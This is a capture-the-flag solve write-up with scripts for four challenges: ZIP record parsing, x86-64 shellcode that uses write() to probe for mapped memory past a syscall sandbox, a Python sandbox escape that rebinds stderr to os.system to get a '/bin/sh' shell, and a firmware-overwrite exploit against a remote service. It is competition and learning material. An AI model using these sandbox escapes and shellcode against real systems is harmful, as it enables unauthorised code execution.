Team ST4RT, 65th

Appnote.txt

import struct

# Solve script for an archive that holds many ZIP end-of-central-directory
# (EOCD) records. Each record contributes one byte of the output.
# Review note: ZIP readers disagree on which EOCD record to honour when several
# are present, so an archive like this can look different to each tool that
# opens it. Scanners should treat multiple EOCD signatures as suspicious.


def u16(x):
    """Decode two bytes as a little-endian unsigned 16-bit integer."""
    return struct.unpack("<H", x)[0]


with open("dump.zip", "rb") as f:
    data = f.read()

# 0xEEE2 is a hard-coded offset specific to this dump.zip. Splitting on the EOCD
# signature leaves one piece per record; the first piece precedes any signature.
records = data[0xEEE2:].split(b"PK\x05\x06")[1:]

# With the 4-byte signature stripped, bytes 12..13 of a record are the low half
# of the 32-bit "offset of central directory" field, which is enough while the
# archive stays under 64 KiB. The byte just before that offset is collected;
# presumably it is the last data byte of the preceding entry - confirm against
# the archive.
flag = bytearray(data[u16(rec[12:14]) - 1] for rec in records)

print(flag)

Segfault Labyrinth

from pwn import *

# Tell pwntools to assemble the shellcode below as x86-64.
context.arch = "amd64"

#p = process("./challenge")
# Connects to the hosted service; the commented-out line above runs a local
# copy of the binary instead.
p = remote("segfault-labyrinth.2022.ctfcompetition.com", 1337)
# Discard the first line the service prints.
p.recvline()

# NOTE(review): eight ASCII "0" bytes plus the newline sendline() appends. How
# the service interprets them is not visible here - confirm against the binary.
p.sendline(b"0"*8)

# What the shellcode does, in order:
#   * Points rsp and rbp at rdi + 0x400 and keeps rdi in r8. This assumes rdi
#     holds a pointer to mapped, writable memory on entry - TODO confirm.
#   * TASK/RUN: for rbx = 0..15, loads the pointer at [r8 + rbx*8] and issues
#     syscall 1 (write on Linux x86-64) with fd 2 and length 1 on it. The loop
#     continues while the result equals 0xfffffffffffffff2 (-14, -EFAULT), so
#     write() acts as a readability test that cannot crash the process.
#   * FOUND: the pointer that passed becomes the next table base (r8). If the
#     first byte there is zero the scan restarts on it; otherwise 0x40 bytes
#     from it are written to fd 1.
#   * If all 16 probes fail, execution falls through to FOUND with the last
#     pointer still in rsi, and `mov rax, [rsi]` faults.
# Review note: if the service confines this code with a syscall filter (not
# shown here), allowing write() is enough to leak which addresses are mapped,
# because the kernel reports a bad buffer as an error return rather than a
# fault. Hiding data behind unmapped guard pages does not hold against that.
code = """
mov rsp, rdi;
mov rbp, rdi;
add rsp, 0x400;
add rbp, 0x400;

mov r8, rdi;

TASK:
xor rbx, rbx;
RUN:
mov rdi, 2;
mov rsi, [r8 + rbx*8];
mov rdx, 0x1;
mov rax, 1;
syscall;

cmp rax, 0xfffffffffffffff2;
jne FOUND;

inc rbx;
cmp rbx, 0x10;
jne RUN;

FOUND:
mov rax, [rsi];
mov r8, rsi;
cmp al, 0;
je TASK;

mov rdx, 0x40;
mov rdi, 1;
mov rax, 1;
syscall;
"""

payload = b""
payload += asm(code)
# Pad the assembled code to exactly 0x1000 bytes with 0x90 (NOP).
p.send(payload.ljust(0x1000, b"\x90"))

# Print whatever the service sends back first; a single recv() may return only
# part of the output.
print(p.recv())

Treebox

# Text submitted to the challenge service. `sys` and `os` are not imported in
# this snippet, so they are presumably already bound where it runs - confirm.
# The payload contains no call expression and no import statement: the stderr
# writer is rebound to os.system by plain attribute assignment.
sys.stderr.write = os.system
a = {}
# Looking up a missing key raises KeyError('/bin/sh'). Reporting the uncaught
# exception goes through sys.stderr.write, which now points at os.system.
# NOTE(review): exactly which strings reach it depends on how the host prints
# the traceback, which is not visible here.
# Review note: if the sandbox works by rejecting AST node types such as calls
# and imports (its source is not shown), this shows why that is insufficient.
# Rebinding an attribute the runtime calls implicitly needs neither. Untrusted
# code needs process- or OS-level isolation.
a["/bin/sh"]
--END

Weather

from pwn import *
import struct


# Decode two bytes as a big-endian unsigned 16-bit integer.
u16 = lambda x: struct.unpack(">H", x)[0]

# do.ihx is read as text; the field layout parsed below matches Intel HEX
# records (count, 16-bit address, type, data, checksum).
with open("do.ihx", "r") as f:
    lines = f.readlines()

# 0x80-byte image, zero-filled; records are copied in at their load address.
payload = bytearray(0x80)

for line in lines:
    # Skip the first character of the line (the record start mark) and decode
    # the rest as hex; bytes.fromhex ignores the trailing newline.
    data = bytes.fromhex(line[1:])
    size = data[0]
    offset = u16(data[1:3])
    # `record` and `checksum` are extracted but never used, so neither the
    # record type nor the checksum is validated.
    record = data[3]
    body = data[4:4+size]
    checksum = data[-1]

    # A zero-length record changes nothing. A record addressed beyond 0x80
    # would extend the bytearray rather than raise.
    payload[offset:offset+size] = body

# Dump the full image before it is trimmed.
print(payload.hex())
# Keep only the image from offset 0x62 onward, prefixed with 14 bytes of 0xFF.
payload = bytearray([0xFF] * 0xe) + payload[0x62:]

p = remote("weather.2022.ctfcompetition.com", 1337)

# NOTE(review): the service's command grammar is not shown on this page. This
# reads as "w <id> <length> <index 40> <0xA5 0x5A 0xA5 0x5A> <data...>" with
# every data byte XORed with 0xFF before sending - confirm against the
# challenge source. f-string formatting renders the hex literals as decimal.
p.sendlineafter(b"? ", (f"w 101153 128 {40} {0xA5} {0x5A} {0xA5} {0x5A} " + " ".join(map(lambda x: str(x^0xFF), payload[:0x40]))).encode())
# Request 64 values back from the same id, drop the first reply line, and parse
# the whitespace-separated decimal values up to the "-end" marker.
p.sendlineafter(b"? ", f"r 101153 64".encode())
p.recvline()
recv = list(map(int, p.recvuntil(b"-end")[:-4].replace(b"\n", b" ").split()))
print(bytes(recv))
print(recv)

# Second write: 19 bytes of 0xFF followed by 0x12, 0x0a, 0x0e, sent with index
# 20 and the same XOR-0xFF encoding (the 0xFF bytes go out as 0).
payload2 = [0xFF]*19 + [0x12, 0x0a, 0x0e]

p.sendlineafter(b"? ", (f"w 101153 128 {20} {0xA5} {0x5A} {0xA5} {0x5A} " + " ".join(map(lambda x: str(x^0xFF), payload2))).encode())
# Hands the connection to the terminal. Everything below runs only after the
# interactive session is exited.
p.interactive()

# Same read-back as above, repeated after the second write.
p.sendlineafter(b"? ", f"r 101153 64".encode())
p.recvline()
recv = list(map(int, p.recvuntil(b"-end")[:-4].replace(b"\n", b" ").split()))
print(bytes(recv))
print(recv)

p.interactive()